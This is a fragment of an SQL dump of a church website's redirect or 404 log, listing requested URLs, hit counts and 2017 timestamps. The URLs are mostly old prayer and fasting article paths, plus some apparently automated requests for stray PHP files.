(6058, 'https://www.lifeoasisinternationalchurch.org/index.php/225-2016-day-8', NULL, '', '', 16, 0, '2017-08-13 16:51:44', '0000-00-00 00:00:00', 301),
(6059, 'https://www.lifeoasisinternationalchurch.org/index.php/181-2015-day-5', NULL, '', '', 16, 0, '2017-08-13 16:56:10', '0000-00-00 00:00:00', 301),
(6060, 'https://www.lifeoasisinternationalchurch.org/index.php/223-2016-day-6', NULL, '', '', 17, 0, '2017-08-13 17:01:19', '0000-00-00 00:00:00', 301),
(6061, 'https://www.lifeoasisinternationalchurch.org/index.php/222-2016-day-5', NULL, '', '', 27, 0, '2017-08-13 17:06:50', '0000-00-00 00:00:00', 301),
(6062, 'https://www.lifeoasisinternationalchurch.org/wow2017/wow2017/index.php?task=confirmreservation', NULL, 'https://www.lifeoasisinternationalchurch.org/wow2017/index.php', '', 1, 0, '2017-08-13 17:06:58', '0000-00-00 00:00:00', 301),
(6063, 'https://www.lifeoasisinternationalchurch.org/index.php/193-2015-day-17', NULL, '', '', 15, 0, '2017-08-13 17:11:00', '0000-00-00 00:00:00', 301),
(6064, 'https://www.lifeoasisinternationalchurch.org/index.php/227-2016-day-10', NULL, '', '', 14, 0, '2017-08-13 17:16:42', '0000-00-00 00:00:00', 301),
(6065, 'https://www.lifeoasisinternationalchurch.org/index.php/191-2015-day-15', NULL, '', '', 15, 0, '2017-08-13 17:22:46', '0000-00-00 00:00:00', 301),
(6066, 'https://www.lifeoasisinternationalchurch.org/index.php/230-2016-day-13', NULL, '', '', 15, 0, '2017-08-13 17:31:27', '0000-00-00 00:00:00', 301),
(6067, 'https://www.lifeoasisinternationalchurch.org/index.php/196-2015-day-19', NULL, '', '', 15, 0, '2017-08-13 17:38:45', '0000-00-00 00:00:00', 301),
(6068, 'https://www.lifeoasisinternationalchurch.org/index.php/81-prayer-focus-for-day-2', NULL, '', '', 12, 0, '2017-08-13 17:47:21', '0000-00-00 00:00:00', 301),
(6069, 'https://www.lifeoasisinternationalchurch.org/index.php/75-prayer-focus-for-day-17', NULL, '', '', 13, 0, '2017-08-13 17:51:16', '0000-00-00 00:00:00', 301),
(6070, 'https://www.lifeoasisinternationalchurch.org/index.php/130-prayer-focus-for-day-7', NULL, '', '', 13, 0, '2017-08-13 17:53:37', '0000-00-00 00:00:00', 301),
(6071, 'https://www.lifeoasisinternationalchurch.org/index.php/127-prayer-focus-for-day-5', NULL, '', '', 18, 0, '2017-08-13 18:00:54', '0000-00-00 00:00:00', 301),
(6072, 'https://www.lifeoasisinternationalchurch.org/index.php/106-prayer-focus-for-day-32', NULL, '', '', 16, 0, '2017-08-13 18:08:45', '0000-00-00 00:00:00', 301),
(6073, 'https://www.lifeoasisinternationalchurch.org/index.php/171-prophetic-words-for-day-7', NULL, '', '', 12, 0, '2017-08-13 18:16:53', '0000-00-00 00:00:00', 301),
(6074, 'https://www.lifeoasisinternationalchurch.org/index.php/265-day-5-of-21-days-fasting-and-prayer-november', NULL, '', '', 34, 0, '2017-08-13 18:22:51', '0000-00-00 00:00:00', 301),
(6075, 'https://www.lifeoasisinternationalchurch.org/index.php/266-day-6-of-21-days-fasting-and-prayer-november', NULL, '', '', 30, 0, '2017-08-13 18:31:42', '0000-00-00 00:00:00', 301),
(6076, 'https://www.lifeoasisinternationalchurch.org/index.php/274-day-14-of-21-days-fasting-and-prayer-november', NULL, '', '', 34, 0, '2017-08-13 18:37:16', '0000-00-00 00:00:00', 301),
(6077, 'https://www.lifeoasisinternationalchurch.org/index.php/271-day-11-of-21-days-fasting-and-prayer-november', NULL, '', '', 32, 0, '2017-08-13 18:42:18', '0000-00-00 00:00:00', 301),
(6078, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/56-prayer-a-fasting-day-7', NULL, '', '', 14, 0, '2017-08-13 18:46:52', '0000-00-00 00:00:00', 301),
(6079, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/30-prophetic-words-for-day-21', NULL, '', '', 14, 0, '2017-08-13 18:50:49', '0000-00-00 00:00:00', 301),
(6080, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/22-prophetic-words-for-day-14', NULL, '', '', 14, 0, '2017-08-13 18:55:52', '0000-00-00 00:00:00', 301),
(6081, 'https://www.lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/174-prayer-focus-for-day-12', NULL, '', '', 14, 0, '2017-08-13 19:02:45', '0000-00-00 00:00:00', 301),
(6082, 'https://www.lifeoasisinternationalchurch.org/index.php/104-prayerfocus31', NULL, '', '', 14, 0, '2017-08-13 21:01:16', '0000-00-00 00:00:00', 301),
(6083, 'https://www.lifeoasisinternationalchurch.org/index.php/103-prayerfocus30', NULL, '', '', 19, 0, '2017-08-13 21:20:13', '0000-00-00 00:00:00', 301),
(6084, 'https://www.lifeoasisinternationalchurch.org/index.php/64-prayer-focus-for-day-11', NULL, '', '', 15, 0, '2017-08-13 22:36:23', '0000-00-00 00:00:00', 301),
(6085, 'https://www.lifeoasisinternationalchurch.org/index.php/129-prayer-focus-for-day-6', NULL, '', '', 7, 0, '2017-08-13 22:41:36', '0000-00-00 00:00:00', 301),
(6086, 'https://www.lifeoasisinternationalchurch.org/streaming)', NULL, '', '', 3, 0, '2017-08-14 00:52:58', '0000-00-00 00:00:00', 301),
(6087, 'https://www.lifeoasisinternationalchurch.org/index.php/240-2016-day-23', NULL, '', '', 40, 0, '2017-08-14 09:22:37', '0000-00-00 00:00:00', 301),
(6088, 'https://lifeoasisinternationalchurch.org/wp-post.php', NULL, 'lifeoasisinternationalchurch.org', '', 12, 0, '2017-08-14 09:53:54', '0000-00-00 00:00:00', 301),
(6089, 'https://lifeoasisinternationalchurch.org/streaming📻', NULL, '', '', 4, 0, '2017-08-14 10:31:06', '0000-00-00 00:00:00', 301),
(6090, 'https://www.lifeoasisinternationalchurch.org/index.php/192-2015-day-16', NULL, '', '', 14, 0, '2017-08-14 10:34:05', '0000-00-00 00:00:00', 301),
(6091, 'https://lifeoasisinternationalchurch.org/index.php/251-day-16-of-21-days-fasting-and-prayer-october', NULL, '', '', 10, 0, '2017-08-14 11:53:31', '0000-00-00 00:00:00', 301),
(6092, 'https://www.lifeoasisinternationalchurch.org/index.php/194-2015-day-18', NULL, '', '', 16, 0, '2017-08-14 15:10:29', '0000-00-00 00:00:00', 301),
(6093, 'https://www.lifeoasisinternationalchurch.org/index.php/200-2015-day-25', NULL, '', '', 14, 0, '2017-08-14 15:56:03', '0000-00-00 00:00:00', 301),
(6094, 'https://www.lifeoasisinternationalchurch.org/index.php/187-2015-day-10', NULL, '', '', 15, 0, '2017-08-14 17:09:30', '0000-00-00 00:00:00', 301),
(6095, 'https://www.lifeoasisinternationalchurch.org/index.php/198-2015-day-23', NULL, '', '', 14, 0, '2017-08-14 17:19:10', '0000-00-00 00:00:00', 301),
(6096, 'https://www.lifeoasisinternationalchurch.org/index.php/239-2016-day-22', NULL, '', '', 31, 0, '2017-08-14 17:50:24', '0000-00-00 00:00:00', 301),
(6097, 'https://www.lifeoasisinternationalchurch.org/index.php/228-2016-day-11', NULL, '', '', 16, 0, '2017-08-14 18:40:30', '0000-00-00 00:00:00', 301),
(6098, 'https://www.lifeoasisinternationalchurch.org/index.php/217-2015-day-40', NULL, '', '', 19, 0, '2017-08-14 18:45:00', '0000-00-00 00:00:00', 301),
(6099, 'https://www.lifeoasisinternationalchurch.org/index.php/236-2016-day-19', NULL, '', '', 25, 0, '2017-08-14 18:50:28', '0000-00-00 00:00:00', 301),
(6100, 'https://www.lifeoasisinternationalchurch.org/index.php/202-2015-day-27', NULL, '', '', 14, 0, '2017-08-14 18:55:46', '0000-00-00 00:00:00', 301),
(6101, 'https://www.lifeoasisinternationalchurch.org/index.php/235-2016-day-18', NULL, '', '', 26, 0, '2017-08-14 19:00:20', '0000-00-00 00:00:00', 301),
(6102, 'https://www.lifeoasisinternationalchurch.org/index.php/79-prayer-focus-for-day-19', NULL, '', '', 13, 0, '2017-08-14 19:05:48', '0000-00-00 00:00:00', 301),
(6103, 'https://www.lifeoasisinternationalchurch.org/index.php/170-prophetic-words-for-day-6', NULL, '', '', 11, 0, '2017-08-14 19:10:17', '0000-00-00 00:00:00', 301),
(6104, 'https://www.lifeoasisinternationalchurch.org/index.php/168-prophetic-words-for-day-4', NULL, '', '', 13, 0, '2017-08-14 19:21:15', '0000-00-00 00:00:00', 301),
(6105, 'https://www.lifeoasisinternationalchurch.org/index.php/269-day-9-of-21-days-fasting-and-prayer-november', NULL, '', '', 36, 0, '2017-08-14 19:25:28', '0000-00-00 00:00:00', 301),
(6106, 'https://www.lifeoasisinternationalchurch.org/index.php/261-day-1-of-21-days-fasting-and-prayer-november', NULL, '', '', 49, 0, '2017-08-14 19:30:50', '0000-00-00 00:00:00', 301),
(6107, 'https://www.lifeoasisinternationalchurch.org/index.php/263-day-3-of-21-days-fasting-and-prayer-november', NULL, '', '', 28, 0, '2017-08-14 19:36:26', '0000-00-00 00:00:00', 301),
(6108, 'https://www.lifeoasisinternationalchurch.org/index.php/264-day-4-of-21-days-fasting-and-prayer-november', NULL, '', '', 24, 0, '2017-08-14 19:41:00', '0000-00-00 00:00:00', 301),
(6109, 'https://lifeoasisinternationalchurch.org/index.php/270-day-10-of-21-days-fasting-and-prayer-november', NULL, '', '', 15, 0, '2017-08-14 20:05:28', '0000-00-00 00:00:00', 301),
(6110, 'https://www.lifeoasisinternationalchurch.org/loic/aboutus.php', NULL, '', '', 46, 0, '2017-08-14 20:14:48', '0000-00-00 00:00:00', 301),
(6111, 'https://lifeoasisinternationalchurch.org/sfn.php', NULL, 'lifeoasisinternationalchurch.org', '', 12, 0, '2017-08-14 20:31:46', '0000-00-00 00:00:00', 301),
(6112, 'https://lifeoasisinternationalchurch.org/temp.php', NULL, 'lifeoasisinternationalchurch.org', '', 20, 0, '2017-08-14 20:35:34', '0000-00-00 00:00:00', 301),
(6113, 'https://lifeoasisinternationalchurch.org/rnnvhs.php', NULL, 'lifeoasisinternationalchurch.org', '', 14, 0, '2017-08-14 20:36:24', '0000-00-00 00:00:00', 301),
(6114, 'https://lifeoasisinternationalchurch.org/sample.php', NULL, 'lifeoasisinternationalchurch.org', '', 10, 0, '2017-08-14 20:37:01', '0000-00-00 00:00:00', 301),
(6115, 'https://lifeoasisinternationalchurch.org/yt.php', NULL, 'lifeoasisinternationalchurch.org', '', 15, 0, '2017-08-14 20:39:54', '0000-00-00 00:00:00', 301),
(6116, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church', NULL, '', '', 10, 0, '2017-08-14 21:18:44', '0000-00-00 00:00:00', 301),
(6117, 'https://lifeoasisinternationalchurch.org/ministries/media-outreach', NULL, 'http://lifeoasisinternationalchurch.org/ministries/wimmp', '', 8, 0, '2017-08-14 21:41:36', '0000-00-00 00:00:00', 301),
(6118, 'https://lifeoasisinternationalchurch.org/index.php/242-day-4-of-21-days-fasting-and-prayer-october', NULL, '', '', 14, 0, '2017-08-15 00:59:28', '0000-00-00 00:00:00', 301),
(6119, 'https://www.lifeoasisinternationalchurch.org/index.php/268-day-8-of-21-days-fasting-and-prayer-november', NULL, '', '', 27, 0, '2017-08-15 03:41:10', '0000-00-00 00:00:00', 301),
(6120, 'https://www.lifeoasisinternationalchurch.org/index.php/277-day-17-of-21-days-fasting-and-prayer-november', NULL, '', '', 30, 0, '2017-08-15 03:45:11', '0000-00-00 00:00:00', 301),
(6121, 'https://www.lifeoasisinternationalchurch.org/index.php/281-day-21-of-21-days-fasting-and-prayer-november', NULL, '', '', 55, 0, '2017-08-15 03:48:45', '0000-00-00 00:00:00', 301),
(6122, 'https://www.lifeoasisinternationalchurch.org/index.php/273-day-13-of-21-days-fasting-and-prayer-november', NULL, '', '', 31, 0, '2017-08-15 03:55:53', '0000-00-00 00:00:00', 301),
(6123, 'https://www.lifeoasisinternationalchurch.org/index.php/270-day-10-of-21-days-fasting-and-prayer-november', NULL, '', '', 28, 0, '2017-08-15 04:01:04', '0000-00-00 00:00:00', 301),
(6124, 'https://www.lifeoasisinternationalchurch.org/wowo2017', NULL, '', '', 1, 0, '2017-08-15 07:23:58', '0000-00-00 00:00:00', 301),
(6125, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct christian/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-08-15 09:43:27', '0000-00-00 00:00:00', 301),
(6126, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-08-15 09:43:29', '0000-00-00 00:00:00', 301),
(6127, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-08-15 09:43:30', '0000-00-00 00:00:00', 301),
(6128, 'https://lifeoasisinternationalchurch.org/component/k2/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-08-15 09:43:33', '0000-00-00 00:00:00', 301),
(6129, 'https://lifeoasisinternationalchurch.org/component/index.php/component/users/?view=registration', NULL, '', '', 1, 0, '2017-08-15 09:43:34', '0000-00-00 00:00:00', 301),
(6130, 'https://lifeoasisinternationalchurch.org/index.php/279-day-19-of-21-days-fasting-and-prayer-november', NULL, '', '', 9, 0, '2017-08-15 11:20:34', '0000-00-00 00:00:00', 301),
(6131, 'https://www.lifeoasisinternationalchurch.org/index.php/278-day-18-of-21-days-fasting-and-prayer-november', NULL, '', '', 37, 0, '2017-08-15 14:07:41', '0000-00-00 00:00:00', 301),
(6132, 'https://www.lifeoasisinternationalchurch.org/index.php/272-day-12-of-21-days-fasting-and-prayer-november', NULL, '', '', 27, 0, '2017-08-15 14:15:20', '0000-00-00 00:00:00', 301),
(6133, 'https://www.lifeoasisinternationalchurch.org/index.php/279-day-19-of-21-days-fasting-and-prayer-november', NULL, '', '', 27, 0, '2017-08-15 14:21:05', '0000-00-00 00:00:00', 301),
(6134, 'https://www.lifeoasisinternationalchurch.org/index.php/280-day-20-of-21-days-fasting-and-prayer-november', NULL, '', '', 33, 0, '2017-08-15 14:26:01', '0000-00-00 00:00:00', 301),
(6135, 'https://www.lifeoasisinternationalchurch.org/index.php/276-day-16-of-21-days-fasting-and-prayer-november', NULL, '', '', 30, 0, '2017-08-15 14:32:46', '0000-00-00 00:00:00', 301),
(6136, 'https://www.lifeoasisinternationalchurch.org/index.php/275-day-15-of-21-days-fasting-and-prayer-november', NULL, '', '', 31, 0, '2017-08-15 14:40:32', '0000-00-00 00:00:00', 301),
(6137, 'https://www.lifeoasisinternationalchurch.org/index.php/262-day-2-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 35, 0, '2017-08-15 14:46:09', '0000-00-00 00:00:00', 301),
(6138, 'https://lifeoasisinternationalchurch.org/index.php/262-day-2-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 18, 0, '2017-08-15 14:48:17', '0000-00-00 00:00:00', 301),
(6139, 'https://www.lifeoasisinternationalchurch.org/index.php/267-day-7-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 25, 0, '2017-08-15 14:53:15', '0000-00-00 00:00:00', 301),
(6140, 'https://www.lifeoasisinternationalchurch.org/index.php/260-day-22-of-22-days-fasting-and-prayer-october-2', NULL, '', '', 27, 0, '2017-08-15 15:02:10', '0000-00-00 00:00:00', 301),
(6141, 'https://www.lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/175-day72014', NULL, '', '', 26, 0, '2017-08-15 15:05:27', '0000-00-00 00:00:00', 301),
(6142, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/57-prayer-a-fasting-day-8', NULL, '', '', 16, 0, '2017-08-15 15:09:14', '0000-00-00 00:00:00', 301),
(6143, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/49-prayer-a-fasting-day-38', NULL, '', '', 14, 0, '2017-08-15 15:17:20', '0000-00-00 00:00:00', 301),
(6144, 'https://lifeoasisinternationalchurch.org/privatestreaming', NULL, '', '', 71, 0, '2017-08-15 15:18:15', '0000-00-00 00:00:00', 301),
(6145, 'https://lifeoasisinternationalchurch.org/private streaming', NULL, '', '', 27, 0, '2017-08-15 15:18:28', '0000-00-00 00:00:00', 301),
(6146, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/21-prophetic-words-for-day-13', NULL, '', '', 14, 0, '2017-08-15 15:20:59', '0000-00-00 00:00:00', 301),
(6147, 'https://www.lifeoasisinternationalchurch.org/media.html', NULL, '', '', 15, 0, '2017-08-15 15:36:20', '0000-00-00 00:00:00', 301),
(6148, 'https://www.lifeoasisinternationalchurch.org/privatestreaming', NULL, '', '', 126, 0, '2017-08-15 16:16:32', '0000-00-00 00:00:00', 301),
(6149, 'https://www.lifeoasisinternationalchurch.org/private/live-streaming', NULL, '', '', 3, 0, '2017-08-15 16:37:09', '0000-00-00 00:00:00', 301),
(6150, 'https://www.lifeoasisinternationalchurch.org/resources/', NULL, '', '', 7, 0, '2017-08-15 16:49:28', '0000-00-00 00:00:00', 301),
(6151, 'https://www.lifeoasisinternationalchurch.org/resources/private-streaming', NULL, '', '', 35, 0, '2017-08-15 16:52:40', '0000-00-00 00:00:00', 301),
(6152, 'https://www.lifeoasisinternationalchurch.org/string', NULL, '', '', 1, 0, '2017-08-15 16:53:30', '0000-00-00 00:00:00', 301),
(6153, 'https://www.lifeoasisinternationalchurch.org/privateing', NULL, '', '', 2, 0, '2017-08-15 16:54:15', '0000-00-00 00:00:00', 301),
(6154, 'https://www.lifeoasisinternationalchurch.org/streaming+private', NULL, '', '', 4, 0, '2017-08-15 17:12:25', '0000-00-00 00:00:00', 301),
(6155, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming/private', NULL, '', '', 74, 0, '2017-08-15 17:15:26', '0000-00-00 00:00:00', 301),
(6156, 'https://lifeoasisinternationalchurch.org/index.php/template-info/wimmp', NULL, '', '', 25, 0, '2017-08-15 17:57:21', '0000-00-00 00:00:00', 301),
(6157, 'https://www.lifeoasisinternationalchurch.org/55-day1', NULL, '', '', 26, 0, '2017-08-15 23:26:38', '0000-00-00 00:00:00', 301),
(6158, 'https://www.lifeoasisinternationalchurch.org/streaming/private', NULL, '', '', 83, 0, '2017-08-16 01:40:28', '0000-00-00 00:00:00', 301),
(6159, 'https://www.lifeoasisinternationalchurch.org/resources', NULL, '', '', 13, 0, '2017-08-16 16:43:32', '0000-00-00 00:00:00', 301),
(6160, 'https://lifeoasisinternationalchurch.org/up.php', NULL, '', '', 26, 0, '2017-08-16 21:25:24', '0000-00-00 00:00:00', 301),
(6161, 'https://www.lifeoasisinternationalchurch.org/?id=featured&format=feed&type=atom', NULL, '', '', 115, 0, '2017-08-16 21:28:40', '0000-00-00 00:00:00', 301),
(6162, 'https://lifeoasisinternationalchurch.org/content-footer.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-08-17 01:08:56', '0000-00-00 00:00:00', 301),
(6163, 'https://www.lifeoasisinternationalchurch.org/?option=com_user&view=register', NULL, '', '', 31, 0, '2017-08-17 02:35:29', '0000-00-00 00:00:00', 301),
(6164, 'https://lifeoasisinternationalchurch.org/feed', NULL, 'http://lifeoasisinternationalchurch.org/feed', '', 39, 0, '2017-08-17 09:24:41', '0000-00-00 00:00:00', 301),
(6165, 'https://lifeoasisinternationalchurch.org/atom', NULL, 'http://lifeoasisinternationalchurch.org/atom', '', 5, 0, '2017-08-17 09:24:41', '0000-00-00 00:00:00', 301),
(6166, 'https://lifeoasisinternationalchurch.org/rss', NULL, 'http://lifeoasisinternationalchurch.org/rss', '', 8, 0, '2017-08-17 09:24:41', '0000-00-00 00:00:00', 301),
(6167, 'https://lifeoasisinternationalchurch.org/sell.php?check=true', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-08-17 15:45:27', '0000-00-00 00:00:00', 301),
(6168, 'https://lifeoasisinternationalchurch.org/wpversion.php?check=true', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-08-17 15:45:56', '0000-00-00 00:00:00', 301),
(6169, 'https://lifeoasisinternationalchurch.org/wologin.php?check=true', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-08-17 15:46:29', '0000-00-00 00:00:00', 301),
(6170, 'https://lifeoasisinternationalchurch.org/registration/index.php', NULL, '', '', 26, 0, '2017-08-17 21:31:31', '0000-00-00 00:00:00', 301),
(6171, 'https://lifeoasisinternationalchurch.org/index.php/274-day-14-of-21-days-fasting-and-prayer-november', NULL, '', '', 12, 0, '2017-08-17 22:47:54', '0000-00-00 00:00:00', 301),
(6172, 'https://lifeoasisinternationalchurch.org/photogallery/', NULL, '', '', 7, 0, '2017-08-18 06:34:50', '0000-00-00 00:00:00', 301),
(6173, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info/mimmp', NULL, '', '', 20, 0, '2017-08-18 09:59:25', '0000-00-00 00:00:00', 301),
(6174, 'https://lifeoasisinternationalchurch.org/18-loic/34-music', NULL, '', '', 78, 0, '2017-08-18 10:59:01', '0000-00-00 00:00:00', 301),
(6175, 'https://www.lifeoasisinternationalchurch.org/template-info/mimmp', NULL, '', '', 6, 0, '2017-08-18 12:45:42', '0000-00-00 00:00:00', 301),
(6176, 'https://www.lifeoasisinternationalchurch.org/live.php', NULL, '', '', 21, 0, '2017-08-18 14:06:23', '0000-00-00 00:00:00', 301),
(6177, 'https://lifeoasisinternationalchurch.org/index.php/256-day-21-of-21-days-fasting-and-prayer-october', NULL, '', '', 13, 0, '2017-08-18 16:05:04', '0000-00-00 00:00:00', 301),
(6178, 'https://www.lifeoasisinternationalchurch.org/ministries/wimmp', NULL, '', '', 13, 0, '2017-08-18 17:21:39', '0000-00-00 00:00:00', 301),
(6179, 'https://www.lifeoasisinternationalchurch.org/ministries/mimmp', NULL, '', '', 10, 0, '2017-08-18 17:21:45', '0000-00-00 00:00:00', 301),
(6180, 'https://www.lifeoasisinternationalchurch.org/resources/streaming-registered/', NULL, 'https://www.lifeoasisinternationalchurch.org/resources/streaming-registered/', '', 3, 0, '2017-08-19 03:13:56', '0000-00-00 00:00:00', 301),
(6181, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/54-prayer-a-fasting-day-5', NULL, '', '', 19, 0, '2017-08-19 05:50:45', '0000-00-00 00:00:00', 301),
(6182, 'https://lifeoasisinternationalchurch.org/media/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/media/logo_img.php', '', 9, 0, '2017-08-19 09:31:02', '0000-00-00 00:00:00', 301),
(6183, 'https://lifeoasisinternationalchurch.org/layouts_/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/layouts_/logo_img.php', '', 1, 0, '2017-08-19 09:42:20', '0000-00-00 00:00:00', 301),
(6184, 'https://lifeoasisinternationalchurch.org/index.php/247-day-11-of-21-days-fasting-and-prayer-october', NULL, '', '', 14, 0, '2017-08-19 10:38:29', '0000-00-00 00:00:00', 301),
(6185, 'https://lifeoasisinternationalchurch.org/system/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/system/logo_img.php', '', 2, 0, '2017-08-19 11:59:53', '0000-00-00 00:00:00', 301),
(6186, 'https://lifeoasisinternationalchurch.org/_installation/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/_installation/logo_img.php', '', 1, 0, '2017-08-19 12:37:58', '0000-00-00 00:00:00', 301),
(6187, 'https://lifeoasisinternationalchurch.org/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/logo_img.php', '', 8, 0, '2017-08-19 12:51:20', '0000-00-00 00:00:00', 301),
(6188, 'https://lifeoasisinternationalchurch.org/bin/header_img.php', NULL, 'http://lifeoasisinternationalchurch.org/bin/header_img.php', '', 3, 0, '2017-08-19 16:02:49', '0000-00-00 00:00:00', 301),
(6189, 'https://lifeoasisinternationalchurch.org/log/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/log/logo_img.php', '', 4, 0, '2017-08-19 20:25:02', '0000-00-00 00:00:00', 301),
(6190, 'https://lifeoasisinternationalchurch.org/sessions/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/sessions/logo_img.php', '', 2, 0, '2017-08-19 20:42:40', '0000-00-00 00:00:00', 301),
(6191, 'https://lifeoasisinternationalchurch.org/media/system_infos.php', NULL, 'http://lifeoasisinternationalchurch.org/media/system_infos.php', '', 8, 0, '2017-08-19 22:19:44', '0000-00-00 00:00:00', 301),
(6192, 'https://lifeoasisinternationalchurch.org/language/headers_img.php', NULL, 'http://lifeoasisinternationalchurch.org/language/headers_img.php', '', 1, 0, '2017-08-19 22:34:15', '0000-00-00 00:00:00', 301),
(6193, 'https://lifeoasisinternationalchurch.org/bin/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/bin/logo_img.php', '', 4, 0, '2017-08-19 23:44:24', '0000-00-00 00:00:00', 301),
(6194, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/19-sample-content-8', NULL, '', '', 6, 0, '2017-08-20 02:17:05', '0000-00-00 00:00:00', 301),
(6195, 'https://lifeoasisinternationalchurch.org/cli/headers_img.php', NULL, 'http://lifeoasisinternationalchurch.org/cli/headers_img.php', '', 1, 0, '2017-08-20 02:45:08', '0000-00-00 00:00:00', 301),
(6196, 'https://lifeoasisinternationalchurch.org/_private/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/_private/logo_img.php', '', 2, 0, '2017-08-20 03:52:13', '0000-00-00 00:00:00', 301),
(6197, 'https://lifeoasisinternationalchurch.org/_private/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/_private/logo_img.php', '', 1, 0, '2017-08-20 03:52:13', '0000-00-00 00:00:00', 301),
(6198, 'https://lifeoasisinternationalchurch.org/cmscore/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/cmscore/logo_img.php', '', 2, 0, '2017-08-20 04:01:22', '0000-00-00 00:00:00', 301),
(6199, 'https://lifeoasisinternationalchurch.org/gobc2016', NULL, '', '', 48, 0, '2017-08-20 05:58:24', '0000-00-00 00:00:00', 301),
(6200, 'https://lifeoasisinternationalchurch.org/logs/system_infos.php', NULL, 'http://lifeoasisinternationalchurch.org/logs/system_infos.php', '', 6, 0, '2017-08-20 06:24:09', '0000-00-00 00:00:00', 301),
(6201, 'https://lifeoasisinternationalchurch.org/logs/system_infos.php', NULL, 'http://lifeoasisinternationalchurch.org/logs/system_infos.php', '', 1, 0, '2017-08-20 06:24:09', '0000-00-00 00:00:00', 301),
(6202, 'https://lifeoasisinternationalchurch.org/resources/live-f', NULL, '', '', 1, 0, '2017-08-20 06:27:13', '0000-00-00 00:00:00', 301),
(6203, 'https://lifeoasisinternationalchurch.org/cli/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/cli/logo_img.php', '', 4, 0, '2017-08-20 06:29:01', '0000-00-00 00:00:00', 301),
(6204, 'https://lifeoasisinternationalchurch.org/index.php/12-sample-content/12-sample-content-1', NULL, '', '', 5, 0, '2017-08-20 07:51:39', '0000-00-00 00:00:00', 301),
(6205, 'https://www.lifeoasisinternationalchurch.org/resources /live-streaming', NULL, '', '', 1, 0, '2017-08-20 08:33:07', '0000-00-00 00:00:00', 301),
(6206, 'https://lifeoasisinternationalchurch.org/11-demo-articles/20-welcome', NULL, '', '', 135, 0, '2017-08-20 09:13:46', '0000-00-00 00:00:00', 301),
(6207, 'https://www.lifeoasisinternationalchurch.org/resources/livestreaming', NULL, '', '', 7, 0, '2017-08-20 09:21:25', '0000-00-00 00:00:00', 301),
(6208, 'https://www.lifeoasisinternationalchurch.org/resources/live -streaming', NULL, '', '', 1, 0, '2017-08-20 09:22:46', '0000-00-00 00:00:00', 301),
(6209, 'https://www.spiritmeat.net/mp3-messages/serie/1?start=20', NULL, '', '', 1, 0, '2017-08-20 09:32:08', '0000-00-00 00:00:00', 301),
(6210, 'https://lifeoasisinternationalchurch.org/facebook/livestreaming', NULL, '', '', 1, 0, '2017-08-20 09:39:30', '0000-00-00 00:00:00', 301),
(6211, 'https://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/seminar', NULL, '', '', 19, 0, '2017-08-20 10:00:33', '0000-00-00 00:00:00', 301),
(6212, 'https://lifeoasisinternationalchurch.org/index.php/template-info/books', NULL, '', '', 67, 0, '2017-08-20 10:01:41', '0000-00-00 00:00:00', 301),
(6213, 'https://lifeoasisinternationalchurch.org/dump/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/dump/logo_img.php', '', 2, 0, '2017-08-20 10:03:38', '0000-00-00 00:00:00', 301),
(6214, 'https://lifeoasisinternationalchurch.org/template-info/wimmp', NULL, '', '', 12, 0, '2017-08-20 10:23:14', '0000-00-00 00:00:00', 301),
(6215, 'https://lifeoasisinternationalchurch.org/actions/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/actions/logo_img.php', '', 8, 0, '2017-08-20 10:49:08', '0000-00-00 00:00:00', 301),
(6216, 'https://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/16-sample-content-5', NULL, '', '', 10, 0, '2017-08-20 10:56:57', '0000-00-00 00:00:00', 301),
(6217, 'https://142.4.21.132/currentsetting.htm', NULL, '', '', 9, 0, '2017-08-20 11:52:12', '0000-00-00 00:00:00', 301),
(6218, 'https://lifeoasisinternationalchurch.org/58-prophetic-words-for-day-6', NULL, '', '', 2, 0, '2017-08-20 12:38:23', '0000-00-00 00:00:00', 301),
(6219, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church-2', NULL, '', '', 26, 0, '2017-08-20 14:16:23', '0000-00-00 00:00:00', 301),
(6220, 'https://lifeoasisinternationalchurch.org/videos', NULL, '', '', 42, 0, '2017-08-20 14:26:05', '0000-00-00 00:00:00', 301),
